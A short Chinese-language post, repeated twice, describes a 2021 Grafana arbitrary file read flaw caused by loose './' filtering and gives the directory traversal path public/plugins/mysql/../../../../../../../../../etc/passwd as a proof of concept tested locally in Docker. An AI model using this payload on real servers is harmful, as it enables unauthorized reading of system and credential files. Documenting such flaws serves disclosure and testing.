2021Grafana任意文件读取POC
因代码中过滤./不严。导致可以跨目录读取文件。
本地环境下漏洞测试POC如下图(测试环境为docker安装的本地环境,图盗自微信网友“早日争取进去”。就是这个名字,我没写错)
漏洞路径:public/plugins/mysql/../../../../../../../../../etc/passwd
因代码中过滤./不严。导致可以跨目录读取文件。
本地环境下漏洞测试POC如下图(测试环境为docker安装的本地环境,图盗自微信网友“早日争取进去”。就是这个名字,我没写错)
漏洞路径:public/plugins/mysql/../../../../../../../../../etc/passwd